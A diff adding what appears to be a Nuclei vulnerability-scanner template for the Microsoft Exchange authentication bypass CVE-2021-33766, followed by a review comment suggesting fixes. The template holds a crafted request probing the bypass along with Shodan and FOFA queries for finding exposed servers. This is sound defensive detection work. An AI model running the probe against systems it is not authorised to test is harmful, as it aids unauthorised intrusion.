diff --git a/http/cves/2021/CVE-2021-33766.yaml b/http/cves/2021/CVE-2021-33766.yaml
new file mode 100644
index 000000000000..e43a433b60cf
--- /dev/null
+++ b/http/cves/2021/CVE-2021-33766.yaml
@@ -0,0 +1,64 @@
+id: CVE-2021-33766
+
+info:
+ name: Microsoft Exchange - Authentication Bypass
+ author: daffainfo
+ severity: high
+ description: |
+ Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
+ reference:
+ - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
+ - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
+ - https://github.com/demossl/CVE-2021-33766-ProxyToken
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2021-33766
+ cwe-id: NVD-CWE-noinfo
+ cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: microsoft
+ product: exchange_server
+ shodan-query:
+ - vuln:cve-2021-26855
+ - http.favicon.hash:1768726119
+ - http.title:"outlook"
+ - cpe:"cpe:2.3:a:microsoft:exchange_server"
+ fofa-query:
+ - title="outlook"
+ - icon_hash=1768726119
+ google-query: intitle:"outlook"
+ tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev
+
+variables:
+ email: "{{randstr}}@{{rand_base(5)}}.com"
+
+http:
+ - raw:
+ - |
+ GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: SecurityToken=x
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '403'
+ - 'function signOut() {'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
+ - "X-BEResource="
+ condition: and
+
+ - type: status
+ status:
+ - 403
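Review bot: In `metadata.shodan-query`, the entry `vuln:cve-2021-26855` names a different CVE from the one this template covers (`cve-id: CVE-2021-33766`), so it looks carried over from another Exchange template; I would drop it and keep only the product-level queries, so that asset inventories built from this metadata are not scoped to the wrong issue. The `description` ends mid-phrase ("the Exchange Server's internal.") and the `info` block has no `remediation:` field; a line such as `remediation: Apply the Microsoft security update referenced in the MSRC advisory for CVE-2021-33766.` would tell whoever triages a hit what to do next. In the matchers, the body word `'403'` adds little beside the `status: 403` matcher. A short comment above `matchers:` explaining why the `ObjectNotFoundException` and `X-BEResource=` header strings indicate an unpatched server would help reviewers judge the false-positive risk, which cannot be assessed from the template alone.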